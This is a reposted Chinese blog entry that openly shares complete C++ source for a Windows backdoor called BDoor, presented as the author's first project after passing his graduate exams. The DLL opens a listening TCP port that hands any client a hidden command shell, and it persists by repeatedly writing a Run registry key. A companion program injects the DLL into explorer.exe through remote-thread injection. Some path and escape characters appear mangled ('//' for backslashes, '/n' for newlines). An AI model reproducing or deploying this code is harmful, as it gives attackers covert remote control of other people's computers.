本文共 6566 字，大约阅读时间需要 21 分钟。

后门程序BDoor及源码     选择自  的 Blog

提交时间：2005-04-22

提交用户：工具分类：后门程序运行平台：Windows工具大小：316825 Bytes文件MD5 ：95e120d97967a3679dfdbd82985ea1ca工具来源：这是本人考研后的第一个作品（其实是很简陋的一个东西），拿出来共享，算是纪念考研成功吧！开放源代码，让大虾们见笑了。

 

// BDoor.cpp : Defines the entry point for the DLL application.

//

#include "stdafx.h"

#include "winsock2.h"

#pragma comment(lib,"ws2_32")

#define PORT 5010

#define REG_RUN "SOFTWARE//Microsoft//Windows//CurrentVersion//Run"

struct THREADPARAM

{  SOCKET sock; HANDLE handle;};

DWORD WINAPI ControlThread(void *no);

DWORD WINAPI BDoor(void *lp);DWORD WINAPI RecvThread(void *lp);DWORD WINAPI SendThread(void *lp);DWORD WINAPI WriteReg(void *no);

BOOL APIENTRY DllMain( HANDLE hModule, 

                       DWORD  ul_reason_for_call,                        LPVOID lpReserved      ){  switch (ul_reason_for_call) {   case DLL_PROCESS_ATTACH:  {    ::CreateThread(NULL,0,ControlThread,NULL,0,NULL);   break;  }

     case DLL_PROCESS_DETACH:

  {    break;  } }    return TRUE;}

DWORD WINAPI ControlThread(void *no)

{  CreateThread(NULL,0,WriteReg,NULL,0,NULL);

 WSADATA wsaData;

    SOCKET listenSock; if(::WSAStartup(MAKEWORD(2,2),&wsaData)!=0) {   return -1; }

 if((listenSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)

 {   return -1; }

 sockaddr_in localAddr,inAddr;

 int addrLen=sizeof(inAddr);  localAddr.sin_addr.S_un.S_addr=0; localAddr.sin_family=AF_INET; localAddr.sin_port=htons(PORT); if(bind(listenSock,(sockaddr *)&localAddr,sizeof(localAddr))==SOCKET_ERROR) {   closesocket(listenSock);  return -1; } listen(listenSock,5);

 while(TRUE)

 {   SOCKET acceptSock=accept(listenSock,(sockaddr *)&inAddr,&addrLen);  DWORD ID;  CreateThread(NULL,0,BDoor,&acceptSock,0,&ID);  Sleep(100); }

 closesocket(listenSock);

 ::WSACleanup();}

DWORD WINAPI WriteReg(void *no)

{  char sysPath[MAX_PATH]={0}; int ret=::GetSystemDirectory(sysPath,MAX_PATH); if(sysPath[ret-1]!='//')  strcat(sysPath,"//"); strcat(sysPath,"DllInjection.exe"); int len=strlen(sysPath); while(TRUE) {   HKEY hKey;  if(::RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey)!=ERROR_SUCCESS)   continue;  ::RegSetValueEx(hKey,"sysDll",0,REG_SZ,(BYTE *)sysPath,len);

  ::RegCloseKey(hKey);

  Sleep(5000); } return 0;}

DWORD WINAPI BDoor(void *lp)

{  SOCKET sock=*((SOCKET *)lp); HANDLE hCmdOut,hCmdIn,hRead,hWrite;

 SECURITY_ATTRIBUTES sec={0};

 sec.nLength=sizeof(sec); sec.lpSecurityDescriptor=NULL; sec.bInheritHandle=TRUE; CreatePipe(&hCmdIn,&hWrite,&sec,0); CreatePipe(&hRead,&hCmdOut,&sec,0);

 char cmdDir[MAX_PATH]={0};

 ::GetSystemDirectory(cmdDir,MAX_PATH); if(cmdDir[strlen(cmdDir)-1]!='//')  strcat(cmdDir,"//"); strcat(cmdDir,"cmd.exe");

 STARTUPINFO startUpInfo={0};

 startUpInfo.cb=sizeof(startUpInfo); startUpInfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; startUpInfo.wShowWindow=SW_HIDE; startUpInfo.hStdError=startUpInfo.hStdOutput=hCmdOut; startUpInfo.hStdInput=hCmdIn;

 PROCESS_INFORMATION processInfo={0};

 int ret=CreateProcess(cmdDir,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startUpInfo,&processInfo); if(ret==0) {   return -1; } CloseHandle(hCmdIn); CloseHandle(hCmdOut);

 DWORD ID1,ID2;

 HANDLE hRecvThread,hSendThread; THREADPARAM recvParam={0},sendParam={0};

 recvParam.sock=sock;

 recvParam.handle=hWrite; hRecvThread=CreateThread(NULL,0,RecvThread,&recvParam,0,&ID1);

 sendParam.sock=sock;

 sendParam.handle=hRead; hSendThread=CreateThread(NULL,0,SendThread,&sendParam,0,&ID2);

 ULONG code;

 ::WaitForSingleObject(hRecvThread,INFINITE); ::GetExitCodeThread(hSendThread,&code); ::TerminateThread(hSendThread,code); ::GetExitCodeProcess(processInfo.hProcess,&code); ::TerminateProcess(processInfo.hProcess,code); closesocket(sock); CloseHandle(hWrite); CloseHandle(hRead); return 0;}

DWORD WINAPI RecvThread(void *lp)

{  char cmd[256]={0}; THREADPARAM param=*((THREADPARAM *)lp); while(1) {   char temp[2]={0};  int ret=recv(param.sock,temp,1,0);  if(ret==0)  {    break;  }  else if(ret==1)  {    send(param.sock,temp,1,0);   strcat(cmd,temp);   if(temp[0]=='/n')   {     if(_stricmp(cmd,"exit/r/n")==0)    {      break;    }    ULONG len;    ::WriteFile(param.handle,cmd,strlen(cmd),&len,NULL);    memset(cmd,0,256);   }  } } return 0;}

DWORD WINAPI SendThread(void *lp)

{  THREADPARAM param=*((THREADPARAM *)lp); char buf[1024]={0}; while(1) {   ULONG len=0;  ::PeekNamedPipe(param.handle,buf,1024,&len,NULL,NULL);  if(len>0)  {    ::ReadFile(param.handle,buf,1024,&len,NULL);   send(param.sock,buf,len,0);   memset(buf,0,1024);  }  Sleep(100); } return 0;}

 

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

// DllInjection.cpp : Defines the entry point for the application.

//

#include "stdafx.h"

#include "windows.h"#include "stdlib.h"#include "tlhelp32.h"#include "io.h"

long GetProcessID(char *processName);

int APIENTRY WinMain(HINSTANCE hInstance,

                     HINSTANCE hPrevInstance,                     LPSTR     lpCmdLine,                     int       nCmdShow){   // TODO: Place code here. Sleep(5000); long ID=GetProcessID("explorer"); if(ID==-1)  return -1;

 HINSTANCE hDll;

 HINSTANCE (* pProc)(LPCTSTR); DWORD (WINAPI * pThreadProc)(void *); if((hDll=::LoadLibrary("kernel32.dll"))==NULL)  return -1; if((pProc=(HINSTANCE (*)(LPCTSTR))::GetProcAddress(hDll,"LoadLibraryA"))==NULL)  return -1; pThreadProc=(DWORD (WINAPI *)(void *))pProc;

 HANDLE hProcess=::OpenProcess(PROCESS_ALL_ACCESS,TRUE,ID);

 if(hProcess==NULL)  return -1;

 char pDllPath[MAX_PATH]={0};

 char *pRemoteAddr=NULL; int ret=::GetSystemDirectory(pDllPath,MAX_PATH); if(pDllPath[ret-1]!='//')  strcat(pDllPath,"//"); strcat(pDllPath,"BDoor.dll"); if(::_access(pDllPath,0)==-1)  return -1;  pRemoteAddr=(char*)::VirtualAllocEx(hProcess,NULL,strlen(pDllPath)+1,MEM_COMMIT,PAGE_READWRITE); if(pRemoteAddr==NULL)  return -1; ret=::WriteProcessMemory(hProcess,pRemoteAddr,pDllPath,strlen(pDllPath),NULL); if(ret==0)  return -1;  HANDLE hRemoteThread=::CreateRemoteThread(hProcess,NULL,0,pThreadProc,pRemoteAddr,0,NULL);

 Sleep(100);

 ::VirtualFreeEx(hProcess,pRemoteAddr,strlen(pDllPath)+1,MEM_DECOMMIT); ::CloseHandle(hProcess); return 0;}

long GetProcessID(char *processName)

{  HANDLE hSnapshot;  PROCESSENTRY32 pe32={0};  BOOL fRet;

 hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); 

 if(hSnapshot==NULL)   return -1;

 pe32.dwSize=sizeof(PROCESSENTRY32); 

 fRet=Process32First(hSnapshot,&pe32);  if(!fRet)   return -1;

 int g=0;

 char drive[_MAX_DRIVE]={0}; char dir[_MAX_DIR]={0}; char fname[_MAX_FNAME]={0}; char ext[_MAX_EXT]={0}; do  {   _splitpath(pe32.szExeFile,drive,dir,fname,ext);  if(_stricmp(processName,fname)==0)  {    g=1;   break;  } }while(Process32Next(hSnapshot,&pe32)); if(g!=1)  return -1;

 return pe32.th32ProcessID;

}

 

转载地址：http://snsqi.baihongyu.com/